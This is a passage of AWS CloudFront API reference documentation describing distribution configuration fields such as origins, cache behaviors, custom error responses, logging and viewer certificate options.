When you specify the value of TargetOriginId for the default cache behavior or for another cache behavior, you indicate the origin to which you want the cache behavior to route requests by specifying the value of the Id element for that origin. When a request matches the path pattern for that cache behavior, CloudFront routes the request to the specified origin. For more information, see Cache Behavior Settings in the Amazon CloudFront Developer Guide .
DomainName (string) -- [REQUIRED]
Amazon S3 origins : The DNS name of the Amazon S3 bucket from which you want CloudFront to get objects for this origin, for example, myawsbucket.s3.amazonaws.com .
Constraints for Amazon S3 origins:
If you configured Amazon S3 Transfer Acceleration for your bucket, do not specify the s3-accelerate endpoint for DomainName .
The bucket name must be between 3 and 63 characters long (inclusive).
The bucket name must contain only lowercase characters, numbers, periods, underscores, and dashes.
The bucket name must not contain adjacent periods.
Custom Origins : The DNS domain name for the HTTP server from which you want CloudFront to get objects for this origin, for example, www.example.com .
Constraints for custom origins:
DomainName must be a valid DNS name that contains only a-z, A-Z, 0-9, dot (.), hyphen (-), or underscore (_) characters.
The name cannot exceed 128 characters.
OriginPath (string) --An optional element that causes CloudFront to request your content from a directory in your Amazon S3 bucket or your custom origin. When you include the OriginPath element, specify the directory name, beginning with a / . CloudFront appends the directory name to the value of DomainName , for example, example.com/production . Do not include a / at the end of the directory name.
For example, suppose you've specified the following values for your distribution:
DomainName : An Amazon S3 bucket named myawsbucket .
OriginPath : /production
CNAME : example.com
When a user enters example.com/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/index.html .
When a user enters example.com/acme/index.html in a browser, CloudFront sends a request to Amazon S3 for myawsbucket/production/acme/index.html .
CustomHeaders (dict) --A complex type that contains names and values for the custom headers that you want.
Quantity (integer) -- [REQUIRED]The number of custom headers, if any, for this distribution.
Items (list) --
Optional : A list that contains one OriginCustomHeader element for each custom header that you want CloudFront to forward to the origin. If Quantity is 0 , omit Items .
(dict) --A complex type that contains HeaderName and HeaderValue elements, if any, for this distribution.
HeaderName (string) -- [REQUIRED]The name of a header that you want CloudFront to forward to your origin. For more information, see Forwarding Custom Headers to Your Origin (Web Distributions Only) in the Amazon Amazon CloudFront Developer Guide .
HeaderValue (string) -- [REQUIRED]The value for the header that you specified in the HeaderName field.
S3OriginConfig (dict) --A complex type that contains information about the Amazon S3 origin. If the origin is a custom origin, use the CustomOriginConfig element instead.
OriginAccessIdentity (string) -- [REQUIRED]The CloudFront origin access identity to associate with the origin. Use an origin access identity to configure the origin so that viewers can only access objects in an Amazon S3 bucket through CloudFront. The format of the value is:
origin-access-identity/CloudFront/ID-of-origin-access-identity
where `` ID-of-origin-access-identity `` is the value that CloudFront returned in the ID element when you created the origin access identity.
If you want viewers to be able to access objects using either the CloudFront URL or the Amazon S3 URL, specify an empty OriginAccessIdentity element.
To delete the origin access identity from an existing distribution, update the distribution configuration and include an empty OriginAccessIdentity element.
To replace the origin access identity, update the distribution configuration and specify the new origin access identity.
For more information about the origin access identity, see Serving Private Content through CloudFront in the Amazon CloudFront Developer Guide .
CustomOriginConfig (dict) --A complex type that contains information about a custom origin. If the origin is an Amazon S3 bucket, use the S3OriginConfig element instead.
HTTPPort (integer) -- [REQUIRED]The HTTP port the custom origin listens on.
HTTPSPort (integer) -- [REQUIRED]The HTTPS port the custom origin listens on.
OriginProtocolPolicy (string) -- [REQUIRED]The origin protocol policy to apply to your origin.
OriginSslProtocols (dict) --The SSL/TLS protocols that you want CloudFront to use when communicating with your origin over HTTPS.
Quantity (integer) -- [REQUIRED]The number of SSL/TLS protocols that you want to allow CloudFront to use when establishing an HTTPS connection with this origin.
Items (list) -- [REQUIRED]A list that contains allowed SSL/TLS protocols for this distribution.
(string) --
OriginReadTimeout (integer) --You can create a custom origin read timeout. All timeout units are in seconds. The default origin read timeout is 30 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 4 seconds; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
OriginKeepaliveTimeout (integer) --You can create a custom keep-alive timeout. All timeout units are in seconds. The default keep-alive timeout is 5 seconds, but you can configure custom timeout lengths using the CloudFront API. The minimum timeout length is 1 second; the maximum is 60 seconds.
If you need to increase the maximum time limit, contact the AWS Support Center .
DefaultCacheBehavior (dict) -- [REQUIRED]A complex type that describes the default cache behavior if you do not specify a CacheBehavior element or if files don't match any of the values of PathPattern in CacheBehavior elements. You must create exactly one default cache behavior.
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true ; if not, specify false . For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CacheBehaviors (dict) --A complex type that contains zero or more CacheBehavior elements.
Quantity (integer) -- [REQUIRED]The number of cache behaviors for this distribution.
Items (list) --Optional: A complex type that contains cache behaviors for this distribution. If Quantity is 0 , you can omit Items .
(dict) --A complex type that describes how CloudFront processes requests.
You must create at least as many cache behaviors (including the default cache behavior) as you have origins if you want CloudFront to distribute objects from all of the origins. Each cache behavior specifies the one origin from which you want CloudFront to get objects. If you have two origins and only the default cache behavior, the default cache behavior will cause CloudFront to get objects from one of the origins, but the other origin is never used.
For the current limit on the number of cache behaviors that you can add to a distribution, see Amazon CloudFront Limits in the AWS General Reference .
If you don't want to specify any cache behaviors, include only an empty CacheBehaviors element. Don't include an empty CacheBehavior element, or CloudFront returns a MalformedXML error.
To delete all cache behaviors in an existing distribution, update the distribution configuration and include only an empty CacheBehaviors element.
To add, change, or remove one or more cache behaviors, update the distribution configuration and specify all of the cache behaviors that you want to include in the updated distribution.
For more information about cache behaviors, see Cache Behaviors in the Amazon CloudFront Developer Guide .
PathPattern (string) -- [REQUIRED]The pattern (for example, images/*.jpg ) that specifies which requests to apply the behavior to. When CloudFront receives a viewer request, the requested path is compared with path patterns in the order in which cache behaviors are listed in the distribution.
Note
You can optionally include a slash (/ ) at the beginning of the path pattern. For example, /images/*.jpg . CloudFront behavior is the same with or without the leading / .
The path pattern for the default cache behavior is * and cannot be changed. If the request for an object does not match the path pattern for any cache behaviors, CloudFront applies the behavior in the default cache behavior.
For more information, see Path Pattern in the Amazon CloudFront Developer Guide .
TargetOriginId (string) -- [REQUIRED]The value of ID for the origin that you want CloudFront to route requests to when a request matches the path pattern either for a cache behavior or for the default cache behavior.
ForwardedValues (dict) -- [REQUIRED]A complex type that specifies how CloudFront handles query strings and cookies.
QueryString (boolean) -- [REQUIRED]Indicates whether you want CloudFront to forward query strings to the origin that is associated with this cache behavior and cache based on the query string parameters. CloudFront behavior depends on the value of QueryString and on the values that you specify for QueryStringCacheKeys , if any:
If you specify true for QueryString and you don't specify any values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin and caches based on all query string parameters. Depending on how many query string parameters and values you have, this can adversely affect performance because CloudFront must forward more requests to the origin.
If you specify true for QueryString and you specify one or more values for QueryStringCacheKeys , CloudFront forwards all query string parameters to the origin, but it only caches based on the query string parameters that you specify.
If you specify false for QueryString , CloudFront doesn't forward any query string parameters to the origin, and doesn't cache based on query string parameters.
For more information, see Configuring CloudFront to Cache Based on Query String Parameters in the Amazon CloudFront Developer Guide .
Cookies (dict) -- [REQUIRED]A complex type that specifies whether you want CloudFront to forward cookies to the origin and, if so, which ones. For more information about forwarding cookies to the origin, see How CloudFront Forwards, Caches, and Logs Cookies in the Amazon CloudFront Developer Guide .
Forward (string) -- [REQUIRED]Specifies which cookies to forward to the origin for this cache behavior: all, none, or the list of cookies specified in the WhitelistedNames complex type.
Amazon S3 doesn't process cookies. When the cache behavior is forwarding requests to an Amazon S3 origin, specify none for the Forward element.
WhitelistedNames (dict) --Required if you specify whitelist for the value of Forward: . A complex type that specifies how many different cookies you want CloudFront to forward to the origin for this cache behavior and, if you want to forward selected cookies, the names of those cookies.
If you specify all or none for the value of Forward , omit WhitelistedNames . If you change the value of Forward from whitelist to all or none and you don't delete the WhitelistedNames element and its child elements, CloudFront deletes them automatically.
For the current limit on the number of cookie names that you can whitelist for each cache behavior, see Amazon CloudFront Limits in the AWS General Reference .
Quantity (integer) -- [REQUIRED]The number of different cookies that you want CloudFront to forward to the origin for this cache behavior.
Items (list) --A complex type that contains one Name element for each cookie that you want CloudFront to forward to the origin for this cache behavior.
(string) --
Headers (dict) --A complex type that specifies the Headers , if any, that you want CloudFront to vary upon for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of different headers that you want CloudFront to forward to the origin for this cache behavior. You can configure each cache behavior in a web distribution to do one of the following:
Forward all headers to your origin : Specify 1 for Quantity and * for Name .
Warning
If you configure CloudFront to forward all headers to your origin, CloudFront doesn't cache the objects associated with this cache behavior. Instead, it sends every request to the origin.
Forward a whitelist of headers you specify : Specify the number of headers that you want to forward, and specify the header names in Name elements. CloudFront caches your objects based on the values in all of the specified headers. CloudFront also forwards the headers that it forwards by default, but it caches your objects based only on the headers that you specify.
Forward only the default headers : Specify 0 for Quantity and omit Items . In this configuration, CloudFront doesn't cache based on the values in the request headers.
Items (list) --A complex type that contains one Name element for each header that you want CloudFront to forward to the origin and to vary on for this cache behavior. If Quantity is 0 , omit Items .
(string) --
QueryStringCacheKeys (dict) --A complex type that contains information about the query string parameters that you want CloudFront to use for caching for this cache behavior.
Quantity (integer) -- [REQUIRED]The number of whitelisted query string parameters for this cache behavior.
Items (list) --(Optional) A list that contains the query string parameters that you want CloudFront to use as a basis for caching for this cache behavior. If Quantity is 0, you can omit Items .
(string) --
TrustedSigners (dict) -- [REQUIRED]A complex type that specifies the AWS accounts, if any, that you want to allow to create signed URLs for private content.
If you want to require signed URLs in requests for objects in the target origin that match the PathPattern for this cache behavior, specify true for Enabled , and specify the applicable values for Quantity and Items . For more information, see Serving Private Content through CloudFront in the Amazon Amazon CloudFront Developer Guide .
If you don't want to require signed URLs in requests for objects that match PathPattern , specify false for Enabled and 0 for Quantity . Omit Items .
To add, change, or remove one or more trusted signers, change Enabled to true (if it's currently false ), change Quantity as applicable, and specify all of the trusted signers that you want to include in the updated distribution.
Enabled (boolean) -- [REQUIRED]Specifies whether you want to require viewers to use signed URLs to access the files specified by PathPattern and TargetOriginId .
Quantity (integer) -- [REQUIRED]The number of trusted signers for this cache behavior.
Items (list) --
Optional : A complex type that contains trusted signers for this cache behavior. If Quantity is 0 , you can omit Items .
(string) --
ViewerProtocolPolicy (string) -- [REQUIRED]The protocol that viewers can use to access the files in the origin specified by TargetOriginId when a request matches the path pattern in PathPattern . You can specify the following options:
allow-all : Viewers can use HTTP or HTTPS.
redirect-to-https : If a viewer submits an HTTP request, CloudFront returns an HTTP status code of 301 (Moved Permanently) to the viewer along with the HTTPS URL. The viewer then resubmits the request using the new URL.
https-only : If a viewer sends an HTTP request, CloudFront returns an HTTP status code of 403 (Forbidden).
For more information about requiring the HTTPS protocol, see Using an HTTPS Connection to Access Your Objects in the Amazon CloudFront Developer Guide .
Note
The only way to guarantee that viewers retrieve an object that was fetched from the origin using HTTPS is never to use any other protocol to fetch the object. If you have recently changed from HTTP to HTTPS, we recommend that you clear your objects' cache because cached objects are protocol agnostic. That means that an edge location will return an object from the cache regardless of whether the current request protocol matches the protocol used previously. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MinTTL (integer) -- [REQUIRED]The minimum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon Amazon CloudFront Developer Guide .
You must specify 0 for MinTTL if you configure CloudFront to forward all headers to your origin (under Headers , if you specify 1 for Quantity and * for Name ).
AllowedMethods (dict) --A complex type that controls which HTTP methods CloudFront processes and forwards to your Amazon S3 bucket or your custom origin. There are three choices:
CloudFront forwards only GET and HEAD requests.
CloudFront forwards only GET , HEAD , and OPTIONS requests.
CloudFront forwards GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests.
If you pick the third choice, you may need to restrict access to your Amazon S3 bucket or to your custom origin so users can't perform operations that you don't want them to. For example, you might not want users to have permissions to delete objects from your origin.
Quantity (integer) -- [REQUIRED]The number of HTTP methods that you want CloudFront to forward to your origin. Valid values are 2 (for GET and HEAD requests), 3 (for GET , HEAD , and OPTIONS requests) and 7 (for GET, HEAD, OPTIONS, PUT, PATCH, POST , and DELETE requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to process and forward to your origin.
(string) --
CachedMethods (dict) --A complex type that controls whether CloudFront caches the response to requests using the specified HTTP methods. There are two choices:
CloudFront caches responses to GET and HEAD requests.
CloudFront caches responses to GET , HEAD , and OPTIONS requests.
If you pick the second choice for your Amazon S3 Origin, you may need to forward Access-Control-Request-Method, Access-Control-Request-Headers, and Origin headers for the responses to be cached correctly.
Quantity (integer) -- [REQUIRED]The number of HTTP methods for which you want CloudFront to cache responses. Valid values are 2 (for caching responses to GET and HEAD requests) and 3 (for caching responses to GET , HEAD , and OPTIONS requests).
Items (list) -- [REQUIRED]A complex type that contains the HTTP methods that you want CloudFront to cache responses to.
(string) --
SmoothStreaming (boolean) --Indicates whether you want to distribute media files in the Microsoft Smooth Streaming format using the origin that is associated with this cache behavior. If so, specify true ; if not, specify false . If you specify true for SmoothStreaming , you can still distribute other content using this cache behavior if the content matches the value of PathPattern .
DefaultTTL (integer) --The default amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin does not add HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
MaxTTL (integer) --The maximum amount of time that you want objects to stay in CloudFront caches before CloudFront forwards another request to your origin to determine whether the object has been updated. The value that you specify applies only when your origin adds HTTP headers such as Cache-Control max-age , Cache-Control s-maxage , and Expires to objects. For more information, see Specifying How Long Objects and Errors Stay in a CloudFront Edge Cache (Expiration) in the Amazon CloudFront Developer Guide .
Compress (boolean) --Whether you want CloudFront to automatically compress certain files for this cache behavior. If so, specify true; if not, specify false. For more information, see Serving Compressed Files in the Amazon CloudFront Developer Guide .
LambdaFunctionAssociations (dict) --A complex type that contains zero or more Lambda function associations for a cache behavior.
Quantity (integer) -- [REQUIRED]The number of Lambda function associations for this cache behavior.
Items (list) --
Optional : A complex type that contains LambdaFunctionAssociation items for this cache behavior. If Quantity is 0 , you can omit Items .
(dict) --A complex type that contains a Lambda function association.
LambdaFunctionARN (string) --The ARN of the Lambda function.
EventType (string) --Specifies the event type that triggers a Lambda function invocation. Valid values are:
viewer-request
origin-request
viewer-response
origin-response
CustomErrorResponses (dict) --A complex type that controls the following:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Quantity (integer) -- [REQUIRED]The number of HTTP status codes for which you want to specify a custom error page and/or a caching duration. If Quantity is 0 , you can omit Items .
Items (list) --A complex type that contains a CustomErrorResponse element for each HTTP status code for which you want to specify a custom error page and/or a caching duration.
(dict) --A complex type that controls:
Whether CloudFront replaces HTTP status codes in the 4xx and 5xx range with custom error messages before returning the response to the viewer.
How long CloudFront caches HTTP status codes in the 4xx and 5xx range.
For more information about custom error pages, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
ErrorCode (integer) -- [REQUIRED]The HTTP status code for which you want to specify a custom error page and/or a caching duration.
ResponsePagePath (string) --The path to the custom error page that you want CloudFront to return to a viewer when your origin returns the HTTP status code specified by ErrorCode , for example, /4xx-errors/403-forbidden.html . If you want to store your objects and your custom error pages in different locations, your distribution must include a cache behavior for which the following is true:
The value of PathPattern matches the path to your custom error messages. For example, suppose you saved custom error pages for 4xx errors in an Amazon S3 bucket in a directory named /4xx-errors . Your distribution must include a cache behavior for which the path pattern routes requests for your custom error pages to that location, for example, /4xx-errors/* .
The value of TargetOriginId specifies the value of the ID element for the origin that contains your custom error pages.
If you specify a value for ResponsePagePath , you must also specify a value for ResponseCode . If you don't want to specify a value, include an empty element, ResponsePagePath , in the XML document.
We recommend that you store custom error pages in an Amazon S3 bucket. If you store custom error pages on an HTTP server and the server starts to return 5xx errors, CloudFront can't get the files that you want to return to viewers because the origin server is unavailable.
ResponseCode (string) --The HTTP status code that you want CloudFront to return to the viewer along with the custom error page. There are a variety of reasons that you might want CloudFront to return a status code different from the status code that your origin returned to CloudFront, for example:
Some Internet devices (some firewalls and corporate proxies, for example) intercept HTTP 4xx and 5xx and prevent the response from being returned to the viewer. If you substitute 200 , the response typically won't be intercepted.
If you don't care about distinguishing among different client errors or server errors, you can specify 400 or 500 as the ResponseCode for all 4xx or 5xx errors.
You might want to return a 200 status code (OK) and static website so your customers don't know that your website is down.
If you specify a value for ResponseCode , you must also specify a value for ResponsePagePath . If you don't want to specify a value, include an empty element, ResponseCode , in the XML document.
ErrorCachingMinTTL (integer) --The minimum amount of time, in seconds, that you want CloudFront to cache the HTTP status code specified in ErrorCode . When this time period has elapsed, CloudFront queries your origin to see whether the problem that caused the error has been resolved and the requested object is now available.
If you don't want to specify a value, include an empty element, ErrorCachingMinTTL , in the XML document.
For more information, see Customizing Error Responses in the Amazon CloudFront Developer Guide .
Comment (string) -- [REQUIRED]Any comments you want to include about the distribution.
If you don't want to specify a comment, include an empty Comment element.
To delete an existing comment, update the distribution configuration and include an empty Comment element.
To add or change a comment, update the distribution configuration and specify the new comment.
Logging (dict) --A complex type that controls whether access logs are written for the distribution.
For more information about logging, see Access Logs in the Amazon CloudFront Developer Guide .
Enabled (boolean) -- [REQUIRED]Specifies whether you want CloudFront to save access logs to an Amazon S3 bucket. If you do not want to enable logging when you create a distribution or if you want to disable logging for an existing distribution, specify false for Enabled , and specify empty Bucket and Prefix elements. If you specify false for Enabled but you specify values for Bucket , prefix , and IncludeCookies , the values are automatically deleted.
IncludeCookies (boolean) -- [REQUIRED]Specifies whether you want CloudFront to include cookies in access logs, specify true for IncludeCookies . If you choose to include cookies in logs, CloudFront logs all cookies regardless of how you configure the cache behaviors for this distribution. If you do not want to include cookies when you create a distribution or if you want to disable include cookies for an existing distribution, specify false for IncludeCookies .
Bucket (string) -- [REQUIRED]The Amazon S3 bucket to store the access logs in, for example, myawslogbucket.s3.amazonaws.com .
Prefix (string) -- [REQUIRED]An optional string that you want CloudFront to prefix to the access log filenames for this distribution, for example, myprefix/ . If you want to enable logging, but you do not want to specify a prefix, you still must include an empty Prefix element in the Logging element.
PriceClass (string) --The price class that corresponds with the maximum price that you want to pay for CloudFront service. If you specify PriceClass_All , CloudFront responds to requests for your objects from all CloudFront edge locations.
If you specify a price class other than PriceClass_All , CloudFront serves your objects from the CloudFront edge location that has the lowest latency among the edge locations in your price class. Viewers who are in or near regions that are excluded from your specified price class may encounter slower performance.
For more information about price classes, see Choosing the Price Class for a CloudFront Distribution in the Amazon CloudFront Developer Guide . For information about CloudFront pricing, including how price classes map to CloudFront regions, see Amazon CloudFront Pricing .
Enabled (boolean) -- [REQUIRED]From this field, you can enable or disable the selected distribution.
If you specify false for Enabled but you specify values for Bucket and Prefix , the values are automatically deleted.
ViewerCertificate (dict) --A complex type that specifies the following:
Which SSL/TLS certificate to use when viewers request objects using HTTPS
Whether you want CloudFront to use dedicated IP addresses or SNI when you're using alternate domain names in your object names
The minimum protocol version that you want CloudFront to use when communicating with viewers
For more information, see Using an HTTPS Connection to Access Your Objects in the Amazon Amazon CloudFront Developer Guide .
CloudFrontDefaultCertificate (boolean) --
IAMCertificateId (string) --
ACMCertificateArn (string) --
SSLSupportMethod (string) --If you specify a value for ACMCertificateArn or for IAMCertificateId , you must also specify how you want CloudFront to serve HTTPS requests: using a method that works for all clients or one that works for most clients:
vip : CloudFront uses dedicated IP addresses for your content and can respond to HTTPS requests from any viewer. However, you will incur additional monthly charges.
sni-only : CloudFront can respond to HTTPS requests from viewers that support Server Name Indication (SNI). All modern browsers support SNI, but some browsers still in use don't support SNI. If some of your users' browsers don't support SNI, we recommend that you do one of the following:
Use the vip option (dedicated IP addresses) instead of sni-only .
Use the CloudFront SSL/TLS certificate instead of a custom certificate. This requires that you use the CloudFront domain name of your distribution in the URLs for your objects, for example, https://d111111abcdef8.cloudfront.net/logo.png .
If you can control which browser your users use, upgrade the browser to one that supports SNI.
Use HTTP instead of HTTPS.
Do not specify a value for SSLSupportMethod if you specified CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate .
For more information, see Using Alternate Domain Names and HTTPS in the Amazon CloudFront Developer Guide .
MinimumProtocolVersion (string) --Specify the minimum version of the SSL/TLS protocol that you want CloudFront to use for HTTPS connections between viewers and CloudFront: SSLv3 or TLSv1 . CloudFront serves your objects only to viewers that support SSL/TLS version that you specify and later versions. The TLSv1 protocol is more secure, so we recommend that you specify SSLv3 only if your users are using browsers or devices that don't support TLSv1 . Note the following:
If you specify CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate, the minimum SSL protocol version is TLSv1 and can't be changed.
If you're using a custom certificate (if you specify a value for ACMCertificateArn or for IAMCertificateId ) and if you're using SNI (if you specify sni-only for SSLSupportMethod ), you must specify TLSv1 for MinimumProtocolVersion .
Certificate (string) --Include one of these values to specify the following:
Whether you want viewers to use HTTP or HTTPS to request your objects.
If you want viewers to use HTTPS, whether you're using an alternate domain name such as example.com or the CloudFront domain name for your distribution, such as d111111abcdef8.cloudfront.net .
If you're using an alternate domain name, whether AWS Certificate Manager (ACM) provided the certificate, or you purchased a certificate from a third-party certificate authority and imported it into ACM or uploaded it to the IAM certificate store.
You must specify one (and only one) of the three values. Do not specify false for CloudFrontDefaultCertificate .
If you want viewers to use HTTP to request your objects : Specify the following value:CloudFrontDefaultCertificatetrueCloudFrontDefaultCertificate
In addition, specify allow-all for ViewerProtocolPolicy for all of your cache behaviors.
